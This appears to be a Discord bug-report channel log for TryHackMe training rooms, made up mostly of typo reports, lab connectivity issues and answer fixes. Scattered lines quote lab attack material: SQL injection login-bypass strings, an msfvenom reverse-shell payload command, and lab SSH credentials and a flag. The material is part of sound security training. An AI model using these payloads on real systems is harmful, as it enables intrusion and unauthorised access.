#room-bugs

yes it's something else

theres 5 different active directory rooms

what one are you accessing

¯_(ツ)_/¯

it's a link in another room

what room

https://tryhackme.com/room/sandboxevasion

yeah its not just you

thats all I was trying to find

Probably wrong room linked.

And the room that's linked is marked private due to either being broken, or old.

As I can still access it.

Likely the one in the screenshot 😄

Threat Intelligence Tools, task 5, "What is the Originating IP address? Defang the IP address." and the Answer format is ****.****.*****.*** no way that's correct.

Why not?

I'm fool my friend

thanks mate

Gave +1 Rep to @quaint sparrow

they already explained it to me 🤣

Apparently the AD Networks have connectivity problems, i was unable to resolve DNS in the lateral movement and exploiting AD network, restarting the Network and recreating the OVPN file did not help. Yesterday i couldn't ping either, despite the Access page telling me i was connected. More and more people seem to be affected.

How are you accessing the networks?

Are you using an attackbox or a VM?

i tried both

no luck

it worked from my VM up until this week without problems

Did you do the steps?

Ie use the correct vpn.

Edit /etc/resolv.conf

?

i did

i can't access my VM from here unfortunately, i can tell you this evening which subnet i am on

the network IP of the lateral movement network is 10.200.64.0 at the moment

if that helps

https://tryhackme.com/room/threatinteltools

The value for this is not constant and will keep on changing on the urlscan.io, wondering why the value is kept static for this?

Got to have this checked.

Ah lol, its based on the screenshot, then its fine LOL

Woah! Glad to see you around!

HAHA, thanks @dusky junco, i need to get active back again!

Gave +1 Rep to @dusky junco

?

https://tryhackme.com/room/wreath HAVING ERROR WITH WREATH ROOM. it redirects me to "/rooms" when try to join room

How do I add screenshots

You need to verify your account.

!docs verify

Im pretty sure thats an ICMP request, so the question answer is wrong, right?

Ping it.

Oh

You literally mean ping? not an nmap ping request

Yeah.

damn, now I feel stupid. thanks

Gave +1 Rep to @quaint sparrow

Not stupid, you're just over thinking it.

You're not the first to nmap it, and you won't be the last.

so why does it respond the nmap -pe and not the ping? Network Filtering??

On room windowsprivesc20 task 5, the windows defender of the machine catches the msfvenom generated on the part "insecure service permissions"

In the WebOSINT room, Task 2, Question 5. The registared city changed from what the answer should be to

"Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region"

Not sure if this is a bug or intended but the windows defender is running in the lateralmovement network and blocks and deletes mimikatz

Isn't it another typo in this room?

I need help with one of the links in content discovery

Which link?

sitemap.xl

sitemap.xml ?

yes

I think there might be a problem with vpn

even though it says it's connected

Can you show a screenshot?

How?

Linux

Linux your host or vm?

Vm

Then use Windows Snipping Tool?

it works now

Room: Linux fundementals part 3
Task: 4

Got my friend confused

Another good point.

The flag isn't in the tmp folder, it's in the folder the ssh enters.

in the pentesting fundamentals room, in the info gathering section of the methodologies task, publicly is spelled wrong (publically)

Incorrect filename: In the Sysmon room, Task 6, the instructions tell you to open Hunting_LSASS.evtx, when it should say :Hunting_Mimikatz.evtx.

https://tryhackme.com/room/linuxfunctionhooking

small spelling mistake

It may be a mistake in the way I am interpreting it, but in the metaploit: exploitation room in the msfvenom section, this one Task question says to use the victim IP, but you have to use the attacking machine IP - it even says ATTACKING in there for some reason in the command too.

Maybe I am missing something, but I even tried also putting the ATTACK IP and it didn't work

is this outdated?
https://tryhackme.com/room/redteamthreatintel

or is it like, only the blue ones? kinda weird why they say 16 techniques then. any reason for that?

isn't the folder view on the left?
https://tryhackme.com/room/introtoc2

Hello, it seems that this room has a small annoying bug that causes the machine to disconnect after 40 or 50 minutes on. Even though there are still several minutes left of the 2 hours proposed in the paid plan.

https://tryhackme.com/room/vulnnetactive

@winged jewel

I think I found a bug but will need someone to check if it was a fluke.

room: https://tryhackme.com/room/nmap01
task: 3
question: 1

"What is the first IP address Nmap would scan if you provided 10.10.12.13/29 as your target?"
I accidentally put "10.10.12." and it accepted the answer. after refreshing the page it filled in the correct answer ||10.10.12.8||

Answer tolerance

hmmm. thats pretty tolerant lol

what are the rules for that? because its not like you can leave a 1 character question blank. id be interested to see how far it can be pushed lol

It doesn’t work for all questions but if an answer is 95% correct it will be accepted.

I had noticed previously that if I fat finger an extra letter in at the end it still accepts it. Didn't think it would work the other way tbh. Thanks for the reply tho. Now I know

Gave +1 Rep to @hazy tiger

Hi! I'm trying to join 'Linux Fundamentals Part 2 & 1' but it's always redirecting me to 'My Rooms' page instead of joining those rooms, and the Part 3 works just fine. Can somebody try and join those rooms to see if this problem can occur with other users or if it's just a problem with me? Thanks in advance!

I’ll check right now. Give me a moment

@sly wind I can join Linux fundamental part 1 & 2 with no issue. Try using a different browser, restarting pc, and possibly even wifi

Then it's a me problem. I've already tried on different browsers and this problem persisted a while ago since I noticed. I'll try restarting the wifi and pc anyway.

Gotcha- sorry I’m not THM staff. Just figured I could check and try to help

That's fine. I still can't join the room and it seems that the problem is around my account.

Thanks for the help anyways!

I've already sent a ticket. Hope they fix it soon.

No worries. Good luck mate

i was active yesterday and was at 53 days now i'm at 0. can someone check this out?

https://tryhackme.com/room/linuxfundamentalspart2 , Task: 5
"Let's use the "cmnatic.pem" file in our initial screenshot at the top of this task."

Screenshot:
tryhackme@linux2:~$ ls -lh
-rw-r--r-- 1 cmnatic cmnatic 0 Feb 19 10:37 file1
-rw-r--r-- 8 cmnatic cmnatic 0 Feb 19 10:37 file2

The Statement should mention "cmnatic" file (there is no .pem), or since ownership has not being explained just "file1"

Check #announcements, and write an email

Linux fundamentals pt 1 task 4 whoami request basically it has me signed in as root access however root isn’t the answer so yeah

that means you're interacting with the wrong machine - the attackbox. You need to use the machine that you deploy in the task that can be done by pressing the green "Start Machine" button

Can't remember off the top of my head what task it is in (probably near the top)

Good catch. I'll get this updated 👍

Linux fundamentals part 2 where it ask to log in after going through the steps the password doesn’t seem to work for some reason?

windowsfundamentals1xbx task2
Then arrived Windows 10, which is the current Windows operating system version for desktop computers.
Windows 10 it comes in 2 flavors, Home and Pro. You can read the difference between the Home and Pro here.

Later is mentioned that Windows 11 is the current.

i think this is a error
room: https://tryhackme.com/room/passwordattacks
taks: 5

Hey, could you share the room URL and task? Hard to guess ^^

yes

SHA-1 should work

okay lemme try

yup

the toolboxvim room is missing an image

On the Wazuh room, task 6, the highlighted link showing what machine IP you are suppose to be connected to, is static instead of dynamic to the correct active machine IP.

hey 👋 I've just updated this. If you refresh the page, it should show the dynamic IP / IP of the machine that you've deployed? 🙂

Confirmed! Thank you for your quick response

Gave +1 Rep to @dusky junco

awesome. TY for reporting(:

Gave +1 Rep to @static grotto

The machine for Day 23 (Task 28) in https://tryhackme.com/room/25daysofchristmas seems broken - it's not accepting any file uploads (images or otherwise).
Can anyone confirm? (RE Question 5)

Is XSS you don't need to upload file

Task 23 is XSS - Day 23 (Task 28) is SQLi for Q's 1-4 and then looking for a reverse shell vector
(clarified above)

https://tryhackme.com/room/threatinteltools
Hello,
Task 3
Q1. What is TryHackMe's Cisco Umbrella Rank?
Q2. How many domains did UrlScan.io identify?
Q4. What is the main IP address identified?

the answers according to urlscan.io are not accepted as valid answers, seems that they haven't been updated with the latest information https://urlscan.io/result/e866f698-7585-4275-82a9-6695fedb2041/

You might need to use the screenshots in the task.

oh got it thanks

Shouldn't this be timestamp rather than timeline in the diamond model room?

Hi there, struggling with task 6 on the SQL Injection room https://tryhackme.com/room/sqlinjectionlm

I'm copying and pasting the ' OR 1=1;-- text into the password field and hitting Login, and it simply does nothing 😢

-- -

I've been informed and double checked that doing this (following the instructions) is all I should need to do for this

this was in reference to following the Task 6 instructions " Blind SQLi - Authentication Bypass " and simply copy pasting the above value to the password field, unfortunately @rugged canyon 's reccomendation of changing the -- to -- - didnt make any difference 😦

oooh blind sqli

that is quite different

yeah sorry Task 6, Level 2 (probably what got us confused)

probably not a bug... would recommend trying to get help in #room-help

thanks I'll drop a message there cheers

good luck and hope someone can figure out how to help

for some reason switching to the following SQL query worked select * from users where username='a' and password='a' OR TRUE;--' LIMIT 1; by providing username a and the password a' OR TRUE;--

but for me, at least, the bypass in the instructions did not work

Holo Network, Task 20, below the SUID permissions explaination screenshot says the following:

Once we have identified a file that we thank may be exploitable, we need to search for an exploit for it.

Should be think

No idea where this should go, as it's not really a bug, but regarding the room "Red Team Fundamentals", and probably others, the term of cyber kill chains is used multiple times as a fundamental concept, for example referencing MITRE ATT&CK. I honestly don't understand why, the concept of kill chains is questionable at at best outside of specifically simulated attacks, and MITRE explicitly stated themselves that it should not be used in this way

The ATT&CK framework is not intended to be interpreted as linear—with the adversary moving through the tactics in a straight line (i.e., left to right) in order to accomplish their goal.2 Additionally, an adversary does not need to use all of the ATT&CK tactics in order to achieve their operational goals
https://www.cisa.gov/sites/default/files/publications/Best Practices for MITRE ATTCK Mapping.pdf

Additionally, most incidents are super short, with the most common number of steps in recorded breaches being just one (1). (Verizon Data Breach Investigation Reports).

Room: https://tryhackme.com/room/webenumerationv2

Task 6: There are some virtual hosts running on this server. What are they?

After running gobuster vhost -u http://10.10.35.223 -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt, I get no results

What I tried:

restarting machine
adding webenum.thm to /etc/hosts
adding --append-domain webenum.thm to the gobuster command
updating SecLists
pinging machine

SOLVED

It turns out I was supposed to use gobuster vhost http://webenum.thm instead of the machine IP

(Which is absolutely impossible to know if you're a beginner)

The screenshots show you to add to the vhost.

I understand it might not be beginner friendly, but if you use the vhost name instead of the ip going forward.

Which screenshots?

The ones in the task.

This one?

No, the ones on Task 6.

It shows you adding to the hosts.

But thay screenshot you sent uses the named address.

Ah yes, but that was not the issue here

The issue is that a beginner cannot possibly know he's supposed to use

gobuster vhost http://webenum.thm

I can guarantee every beginner will be stuck here trying to run

gobuster vhost http:///MACHINE_IP

gobusters help page on vhosts also says that you probably want to run it against the ip instead of a domain name soooo yeah

Even going by the screenshots.

THM could possibly reflect the screenshot to say webenum.thm

$ gobuster vhost --help
Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)

Usage:
  gobuster vhost [flags]

Flags:

which could also cause confusion

though obviously tryhackme can't change the gobuster help page but a note about it somewhere would probably help

Same problem in https://tryhackme.com/room/webenumerationv2

Task 9 --- 2.2. Practical: WPScan (Deploy #2)

When scanning for theme: wpscan --url <URL> --enumerate t

We have to use wpscan webenum.thm --enumerate t instead of the IP of the deployed machine.

Some people might experiment and find this out like I did, but I'm pretty sure some will get stuck

Also

Hint for the version of the theme says the answer is "2.3", but it's actually "2.5"

Hi everyone, on the room MalBuster are the answers 3 and 4 not up to date anymore...

Room: https://tryhackme.com/room/uploadvulns
Task: 7

The web app 'java.uploadvulns.thm' doesn't allow legitimate jpeg/jpg file uploads.

I tried multiple pictures, small and big sizes, I tried both .jpg and .jpeg, and I tried a php shell with both .jpg and .jpeg extensions.

The response is always "Invalid File Type".

This can be solved by bypassing the filter, but there is an example of uploading a shell with a legitimate extension (.jpg, .jpeg), intercepting using Burp Suite, and changing the extension back to .php.

This can't be done since the web app doesn't allow any uploads at all without bypassing the filter. 🙂

Using wenemum.thm instead of the IP should be clear, since the first instruction tells you to add that hostname to your file

Regarding the issue for the hint:

We decided to remove that question entirely as it would require constant updating 🙂
So thanks for reporting

Gave +1 Rep to @errant grail

Glad I could help 👍

how can share a screenshot for a bug ?

!docs verify

^^

is it not 18.04.6 ?

No, you need to ssh in to the user, you're running that command on the attackbox

oh

okay

It tells you above the questions.

Done!

Bot do your job

Intermediate Nmap ssh couldn't connect .its timeout $ssh ubuntu@10.10.72.110
how can i solve them

Do you need to ssh in?

yes because flag inside box

Can you link the room?

https://tryhackme.com/room/intermediatenmap

ssh In case I forget - user:pass
ubuntu:Dafdas!!/str0ng

Where did you get those credentias from?

from nmap scanning

Do you have a machine open?

yes another box

it was time out

For these credentials, what are you doing?

there is an 4 port in total but 31337 port cmd netcat get cridentical .to try ssh . but its not working

Yes, what are you entering for credentials?

ssh <user>@<ip address> -p <port number >

port number isn't needed.

What user name and password are you trying?

yes its timeout

I get that.

But what are you using as the password and username??

can i use this user: ubuntu pass: Dafdas!!/str0ng

Yes.

I was able to ssh in using those credentials.

but its couldn't working for my pc .

ok thank you friend .it's really helpful for me

Hey guys!
In the AD modules I can't connect to the Lateralmovementandpivoting VPN:
Pinging 10.50.61.172 with 32 bytes of data:
Request timed out.

Even the attackbox doesn't ping the THMDC:
PING 10.200.64.101 (10.200.64.101) 56(84) bytes of data.
From 10.50.61.1 icmp_seq=1 Destination Host Unreachable

Please fix this issue

https://tryhackme.com/room/mitre - Task 7.
Center of Threat-Informed Defense
https://mitre-engenuity.org/ctid/
is a broken link, valid link might be
https://mitre-engenuity.org/cybersecurity/center-for-threat-informed-defense/

Hello guys

I have a doubt

Thanks, I just ran into this problem. I can confirm after I did db_disconnect, the post module works fine.
It's actually task 6 on https://tryhackme.com/room/metasploitexploitation

I also noticed that my guacamole shell resets every time I switched from the victim to the attacker machine.
If this can't be avoided, I think it would be good to mention to run the shell.elf in the background with ./shell.elf & or to open the two machines in separate tabs.

Gave +1 Rep to @drifting kindle

brainstorm has only 3 ports open but the answer to the question how many ports are open is 6 for some reason

should be a quick fix to just change the answer

This is minor but there is an extra space in a number. It's the new Risk Management Room, Task 6 in the last equation. It says "ALE = SLE × ARO = $9000 × 0.5 = $4, 500.. It should say "ALE = SLE × ARO = $9000 × 0.5 = $4,500 " without a space after the comma and without the period at the end.

Hello, can anyone tell me how to resolve an issue I am having with the Wireshark 101 room? I can not submit my answers after I input them. Either submit or completed none is functional

Do not worry guys, I figured it out. Thanks

dm'd. Not gonna spam here

everything OK? Dont hesitate to DM if there's trouble

In the room Risk Management, Task 7 Respond to Risk, one of the scenarios has the before the safeguard EF at 1% and after the safeguard EF at 10%. When I run the calculations, I seem to always get this one incorrect. Not sure if this is a bug or I'm making a mistake in my calculations, but for the EF to increase after the safeguard, seems like a bug.

Asset: Laptop
Risk: Malware
Asset Value: 2000
EF: 1%
ARO: 2

Safeguard: Antivirus license
Cost of Safeguard: $20
EF after Safeguard: 10%

Not sure if this counts as a bug, but doing the passive reconnaissance room, Task 6 (shodan) it asks

Based on Shodan.io, what is the 3rd most common port used for nginx?

The answer is 888 but the search now states 5001

Wait why are people using 5001 now?

I would imagine that is apps being reverse proxied rather than say nginx itself listening on port 5001

Even on a reverse proxy though, the exposed port is nginx's not whatever node app is running behind

yeah true I guess it just depends how shodan is crawling it

Hello everyone,
I'm stuck with the question below
Referencing the dmarcian SPF syntax table, what prefix character can be added to the "all" mechanism to ensure a "softfail" result?

I answered v=spf1 ~all but it does accept the answer

This room is on SOC ANALYST 1 - Phishing - phishing prevention - Task 2 - SPF.

I think https://tryhackme.com/room/introtoshells -> Task 9 question 3 should be linux/x64 and not windows x64:|| msfvenom -p windows/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443||

reload the page and check what it says the flag is again

think you got it through due to answer tolerances

Now it says linux. Thanks for fixing it!

Gave +1 Rep to @rugged canyon

shadow did not fix it... on tryhackme if you submit an answer and it is very few letters off it will take it as the correct answer.... when you reload the page after it shows you the correct answer to the question in the submission box

Good to know! Maybe windows should be blacklisted because it's not really the correct answer.
I have one question for Taks 13 in the same room. Should the encoded PowerShell payload from task 11 work there if I uploaded a basic php cmd RCE?

don't think there is any denylist available for question answers

Nevermind about the powershell. I tried it again and now it's working

Found something else:
https://tryhackme.com/room/introtoshells Task 8:
There is no /usr/share/windows-resources/binaries on the attack box.

:Wave:
Looks like the answer for question 14/15 in https://tryhackme.com/room/autopsy2ze0 is only accepting when the answer contains parentheses () in place of the back-ticks (`) contained in the actual file/memory-dump.

the assembly emulator is not working the x86 Assembly crash course room

is it just me or someone has the same problem?

Exploiting AD Network Task 2:
Under „AddMember“ it says „Start PowerShell (either in RDP or via SSH) on the THMJMP1 host“, with this probably THMWRK1 is meant.

This isn‘t a bug but I wanted to report it anyways to avoid confusion, didn‘t know where else to post it.

hello guys, I'm currently following the CTI module, however, in the TI Tools room, task 5, "phishtool", the VM has no access to internet, hence, I can't use firefox with phishtool. I raised a ticket but it will take long time, I suppose.
as I have no time to lose 😄 could anyone send me the last 2 answers?

I would really like to complete this room today

You should be able to use Thunderbird to open the email

hi, cant access any path or module

trying to upload now picturues to show what I mean

Windows Fundamentals 2, Task 5, Question: What is listed under System Name?
It's meant to be What is the value of System Name? instead.
At first sight, I thought it was asking for System Manufacturer.
I don't know If It counts as a room-bug. Please inform me

lol no.

I think that's a language symantic thing, just my take

sorry, cant find upload pics button

!docs verify

hey guys, anyone else have an issue with the MySQL service not being started on the ContainMe box?

{unix_user}@host2:~$ mysql -u{some_user} -p{some_password}
mysql -umike -ppassword
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)

just an image, well actually not an image
link:https://tryhackme.com/room/dataxexfilt

Hi ibadov, replying a bit late. The form actually works... if you use a space between each number. It took me time to figure it out. I don't get why the code is not simply stripping them before checking the answer...

Hi, this may not be a bug as it seems more like a typo but in the OWASP API Security Top 10-1 room under task 4 it asks you to add an Authorisation-Token header, but it seems to only work with the American Authorization-Token spelling.

https://tryhackme.com/room/loggingforaccountability

Task 6

What utility was used in the oldest event associated with "James"?

Impossible to find

In the Network Device Hardening room task 4 question 2 does not match the config file. https://tryhackme.com/room/networkdevicehardening

In the risk management room, the copy button of the final task copies the wrong Flag. 🙂

Not sure if this is caused by my bionic reading extension, but there's some non-breaking space characters in the Conclusion section of the Security Engineer Intro room.

Can you disable it and check?

https://tryhackme.com/room/cybergovernanceregulation

https://tryhackme.com/room/burpsuiteom
task 7:
spelling error:

Thank you for reporting. 🙂

Gave +1 Rep to @manic island

hey there is a question in room SSDLC which i finally worked out the answer to it but it makes no sense.
question is

When do you typically carry out Vulnerability Assessments or Pentests?

now an answer that would make sense is , once a year or after upgrade etc.

am i allowed to say what the answer is?

They're asking which project stage

I think they mean the first pentest

task 7 in SSDLC

the answer isnt a when though , its a what.

its like asking 'when do you get your car serviced and you answer
mechanic & automotive

makes no sense

It's a lifecycle phase

So when makes sense in that context

maybe if the question was during what phase, during when, or at least have the answer include DURING such n such PHASE. wasted like 30 min trying to work out a "when" answer lol

I mean if you read the task it would be obvious enough 😉

Exactly, sometimes reading obviously will reveal the answer.

Hello, I'm not sure where to post my message and I apologize if I'm not in the right place.

Is it normal that I experience a lot of lag on remote machines (I've tested 2: pickle rick & Basic Pentesting) and the problem is the same everywhere:

• loss of ping
• loss of connection
• temporary inaccessibility
• ...

this makes it impossible to work, is the probeemen coming from me ?

Hey all, I'm having an issue with oh my webserver where port 80 is not open. Is that intended?

^

Just spotted that there is a small typo in https://tryhackme.com/room/securityprinciples. In Task 4, Biba model, it says "Start Integrity Property" and should say "Star Integrity .."

https://tryhackme.com/room/owaspapisecuritytop105w
task 4 - Question 2 To which country does sales@mht.com belong?
This Requires using a header called Authorization-Token instead of Authorisation-Token (typo) someone noted that in the room forum, idk if it's worth correcting @glad badger

hey i cant open/join the room page/room from https://tryhackme.com/module/hacking-active-directory, the first one works but the others not...

On the risk management room when I got to the very end if I hit copy on the flag it gives me this random other flag instead of the correct one.

I assume its an old flag from before the update? idk

Is it issue solved, if it issue didn't fixed, you can try copy-paste from source code ?

mine? I just copy pasted it manually and that works. its only if you hit the copy button there on the side i think

I had to do the last part twice cuz my stupid ass closed it before hitting paste just assuming it would have copied the right thing lol

Okey, no problem, if your issue is solved is good, congratulations again.

So a member of my team created a room and gave it out to the team but it seems like the people who have premium are the only ones getting nmap results back. Is there an issue with free users not being able to scan private boxes?

@raw bison @glad badger @lucid oasis Could you please support us ? thanks in advance for reply !

Gave +1 Rep to @polar geode

Yes thanks team! Big fan of yall 🙂

For free users it will have limited resources for private rooms. 🙂

Sorry if I'm being redundant but does that include limited capabilities for performing network scans?

Good question, okey is limited the access to room, but process ? @glad badger

Just a small extra note, even with my answers they can't connect to the attacking machine

Nope, there's no specific limitations like that. Machines deploy with increased resources (RAM) for subscribers.

If a free user isn't getting a response i.e nmap scan but a subscriber is, it means the services on the machine haven't been able to start for the free users because of the amount of RAM (512mb)

Yee it was less of a problem i needed help on and more of a bug report 😀

Thank you Ben. That makes sense. Really appreciate the help on this

I'll make sure to communicate this to my team

Gave +1 Rep to @dusky junco

No problem. When developing the VM, it's worth to test/consider in mind how it performs for free users and such 🙂 (512MB RAM for free - 1GB RAM for subscriber) by default

Worse comes to worse I think they also had an OVA they might pass around because I know not all are able to upgrade their accounts. But I might end up developing rooms in the future so now I know what to test 🙂 thanks again. Really appreciate the quick efforts and the support

Gave +1 Rep to @dusky junco

You're more than welcome:)

Security Engineer paths <- the calculation is wrong 😉

Yes, for now a bug is available.

When I was working on the Lateral Movement and Pivoting room, connection timed out; no servers could be reached.
problem, but there is no problem with the Exploiting Active Directory room. I am using attackbox. Can anyone tell me how to solve this problem?

Hey, if there is no any issue with other rooms, probably may be issue on a router that on route, can you run traceroute ?

@dusky junco @gleaming shadow https://tryhackme.com/room/lateralmovementandpivoting There is a problem with VPN file of the related room, can you support ? @astral bear

What's the problem?

So I finished Managing Incidents and Network and System Security few days ago and I just noticed some of those progress have been deleted 😮

Room: Printer hacking 101
Task3: targeting & Exploitation
Issue: Chee sheet reference material link no longer valid (http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet). question 1 and question 2 refer to the use of this cheat sheet to answer the task.

There is a copy aviable on Wayback machine (https://web.archive.org/web/20230329224752/http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)

Room: Splunk: Dashboards and Reports
Task 5: Alerting on High Priorioty Events
VM Name: Splunk_Dashboard
Issue: Alerts not enabled by attached Splunk license in deployed VM. can not follow along with the material.

The badge should be given (by what the description says) in the Risk Managment room, and not the Vulnerability Managment.

Room: Gaming Server
Task 1: What is the user flag?
Issue: It says answer incorrect even though the flag is correct

Game zone?

gamingserver

https://tryhackme.com/room/gamingserver

What flag do you have?

user.txt - a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e

Worked for me.

Are you entering the usertxt - also?

Hi team, I completed OWASP API rooms, but there is no badge in my Earned list. Could you help me with that?

Hey Aleks, if you completed the room before, you had need to reset the room but if you haven't completed the room before and still although that if you getting an error, you can fill up again the answers by resetting the room and of course, if your remember your answers.

Or open the room side and by side, and reset one, and just copy and paste the answers.

I completed it before, thanks @oblique panther and @quaint sparrow for your help! I'll reset and copy-paste.

Gave +1 Rep to @oblique panther

nope

it worked now nvm idk what was happening...

sry to disturb you

Definitely!

We thanks you, if your do a reply with a feedback positive or negative your answer, we will so glad.

Gave +1 Rep to @last creek

anyone know if the Net Sec Challenge ctf is bugged im doing exactly what the hint is telling me using the right password list to brute force ftp and its not working

It's not bugged

nope my bad i completed the room thank you

Hello,
I think the "Internal" room is broken.
It is impossible to load the wordpress part.
Only the "blog" page loads without the css and I can't access the wp-login page to continue.

White page?

sudo ip link set dev tun0 mtu 1200

Try this 🙂

I get this error message on wp-login:

Hmm. We're having trouble finding that site.

We can't connect to the server at internal.thm.

If you entered the right address, you can:

    Try again later
    Check your network connection
    Check that Firefox has permission to access the web (you might be connected but behind a firewall)

Did you add the ip and website to your hosts file?

I'm using an AttackBox, there's no tun0 interface.

no, I'll try

It works. Thank you.

Gave +1 Rep to @quaint sparrow

in the h4cked room you have to guess the pentestmoney.net url because the site doesn't exist anymore. it also renders the question invalid.

Machines do not have internet

If that’s the AttackBox, I don’t know what happened there

that's my computers own vm lmao hold on

now it works

Issue with displaying split view / full screen in the room Velociraptor.

Regardless of browser, extensions, OS, incognito or not. I just end up with a white split view or land on a about:blank#blocked.
So far I've tried Edge, Chrome and Firefox. Incognito and no incognito.
Cleared Browser Cache and cookies.
On host machine (win10), vm with win10, and a kali vm.
On the vm's I've tried to use the tryhackme vpn to circumvent any network blocks on my local network.

@quaint sparrow Hi, can you support ?

No, there is nothing I can do about that.

So is it on tryhackmes end this problem?

Issue with Virtualization and Containers room. Unable to connect to 10.10.64.0:5000

Would love to post a screenshot but seems this discord server won't let me.

hey, I don't know if this counts as a bug, but I think something is wrong with the cluster in https://tryhackme.com/room/virtualizationandcontainers Virtualization and Containers task 6. I don't really know kubernetes much, but it looks like there is no proper communication and requests are timing out.

The app in task 5 runs just fine, btw. I was able to access in in the browser after initiating a container.

Task 6 is running fine for me but task 5 is not

Do you have the answer for task 5?

hahaha, that's funny. I don't know how backend works, maybe too many people at once try to connect. yeah, I do, you can DM me.

Exactly may be two reason of this issue, one of these the computer may don't found the right route and second of these, may be much more request on the tryhackme server.

I know it can't communicate, because error messages say that, but I don't know if it fails because of some misconfig or too many requests.

Exactly, we need to examine the backplane or background to understand that is due to what.

Hello! I was going to do simpleCTF and saw the room is private, what happened? Is this a bug?

Can you link the room?

https://tryhackme.com/room/simplectf

Yes, that room was replaced with https://tryhackme.com/room/easyctf

oh! awesome! thank you!

Happy hacking!

These rooms are very high quality. However, I do come across the occasional typo. Should I inform someone or leave them alone for the most part?

If you think there is typos. post in #room-bugs

which is where they currently are

so yeah report typos here and hopefully they get fixed in a timely manner

https://tryhackme.com/room/iaaaidm

'''Eventually, the album permissions with show a few accounts with view permissions.'''

In task 9 under "Discretionary access control"

Was kinda a hard read till I noticed "with" instead of "will"

Logging for Accountability -> Splunk page loads partially, has the Splunk Enterprise logo with the green text background and a "Server Error" message. I have tried multiple times, last night and today using different machine instances, all to get the same page.

Also, I let it sit for 20+ minutes to give it plenty of time to load

In https://tryhackme.com/room/cybergovernanceregulation

In task 7, under "Service Organization Control 2", the underlined words "SOC" provide a definition for "security operations center" instead

OWASP Juice Shop was really unsatisfying i solved all the tasks and most of them won't give me back the flag i searched for online solutions and i really copy-pasted the flags to move forward.

Yes unfortunately the owasp juice shop room unsatisfying generally but it is not related with event that is available

In the room OWASP API Security Top 10 -1 Task 4, it says to use the header Authorisation-Token but it will return a 403 Forbidden because the header should be Authorization-Token (z instead of an s).

Is it a bug, sorry i asking for i don't know that ?

Hi guys

I want to report a concept issue which I am not sure about, In here the last arrow should be in the opposite direction right?

since POP3S used to retrieve not send emails

No, I think this impression is correct because how is an encrypted email sent to the client, rather it is sent encrypted by the client.

Sorry, still dont get it?

how would a client send an email using POP3S, POP3S is used to retrieve emails

this screenshot taken from the same room

Network Security Protocols

Because, there is an authentication and during authentication it is need to use an algorithm the client, and exactly in here the client sending by encrypting the email by using the algorithm that wants of the server.

do u mean that this email is The email sent by a client to ask the server to retrieve its emails?

It often requires email clients to use StartTLS to send mail that as mentioned it in here, and since port 25 was designed for mail transfer, not submission, in here exactly has to do this by encrypting.

The question is why would the client send an email, The protocol talks about retriving emails from server

Where is the retreival part?

Already, talking about StartTLS ?

Can you look on the photo ?

StartTLS is used For encryption

The question is, after encryption where is the email I requested from the server?!

Bro, it is just the protocol process, the StartTLS it is dosn't care whether you got the email or not, and this is the protocol process anyway.

I get what you say but as I am completely sure, that retrieving the email is part of POP3S

Yes, exactly you are already taking email but there is a showing for StartTLS only in picture it and of course you are taking an email on POP3S, so you know right.

ok ty ty

I was just confused about the last arrow, I mean sending an encrypted email, Not the previous steps

Okey no problem, i'm happy if I did any help 🧐

Ty @oblique panther

Gave +1 Rep to @oblique panther

Thank you too!

Gave +1 Rep to @ornate solar

It's a typo

I believe @ornate solar is right and that the encrypted email is sent from the server to the client.

So the arrow should be to the left from everything I've gathered

Not sure if this is the right place, but talking to some people, we may want to update “Intro to C2” as Armitage is no longer kept up with, and is not really a relevant tool to the Red Team path

https://tryhackme.com/room/burpsuiteintruder
In Burp Suite: Intruder Room: Regarding this stmt: "Note: You should be getting 302 status code responses for every request in this attack. If you see 403 errors, then your macro is not working properly."

Out of 100 Intruder Requests, I get seven 403's every time when I do this exercise. My attack does find the correct solution, but am curious why my experience doesn't match the above note, namely "every request should be a 302"??

Suggestion: Edit the wording to something like "Note: You should be getting 302 status code responses for almost every request in this attack. If you see a majority of 403 errors, then your macro is not working properly."

In task 12 you're supposed to query /admin/login/. You shouldn't see any 403 at all with the right endpoint.

Interesting- that is the endpoint I used. Several THM members also experienced this. One solved it by adding a delay. I speculate this may be due to Cloudfare rate-limiting but would love to hear your thoughts.

btw, not sure if you're the room creator, but just wanted to share I took the Burp Series last year, and really like the new facelift on the content!

Oh sorry, I misread screenshot 🤦‍♂️ . I'm sure of nothing then. Maybe I didn't have problems because my internet connection is very bad

ok so an unwelcome "built in delay" baked into your internet. "It's a feature, not a bug!" lol

There should not be a WAF on that box, assuming they've just reused the one I originally built

Not sure why you're getting a mixture of status codes though, and I don't have access to debug now 🤷‍♂️

The thmlabs.com domain isn't proxying through Cloudflare either -- not sure if you were using that or not

Are you using Burp pro or the community edition?

community

Mhh, I just tried it and all I got was 1 403

I'll have a look if it might be something in regards to resources of the machine

It would be perfect!

Hello, I can't access the wreath machine, I have the correct vpn but cannot even ping it, is it normal?

Thanks for checking. My overall purpose was to soften the language around the Note section in the content of the room (see my original post) , so people don't get thrown by a few 403s, thinking they are doing something wrong. Also, from a learning perspective, it's always great to explore anomalies and unexpected behavior, especially with the room creator;)

Gave +1 Rep to @raw bison

In the manual discovery - Framework stack room of web fundamentals path. Task 6 asks you to view the thm-framework-login directory on the website to get a flag. On viewing that directory I get no flag though.

Doubt this is a bug, you are probably just looking at the wrong URL or something, what URL are you trying to access to get the flag?

http://machineiphere/thm-framework-login

"Let's take a look at that website. Viewing the documentation page gives us the path of the framework's administration portal, which gives us a flag if viewed on the Acme IT Support website."

That quote talks about the framework link

mhm, that is correct, you need to login from there to get the flag, the documentation page tells you the creds

sigh, why does my brain work like this. Ty and sorry for the bother

haha, no worries, sometimes we just miss the most obvious things

I don't have the Red teamer title (only the security warroir), but it's displayed as Red teamer in the leaderboards

Known issue. 🙂

Ah, okei

Is it because of the 1337 level?

I don't think they've changed the rank name in places.

If you use your thm profile badge. It still says it's lucky which was a rank 3 ranks.

Hello, there is no an issue with as my knowledge, if possible can you share a picture related with your issue ?

I can't access website through firefox but I can curl it

Did you try it with the other or another web browser ?

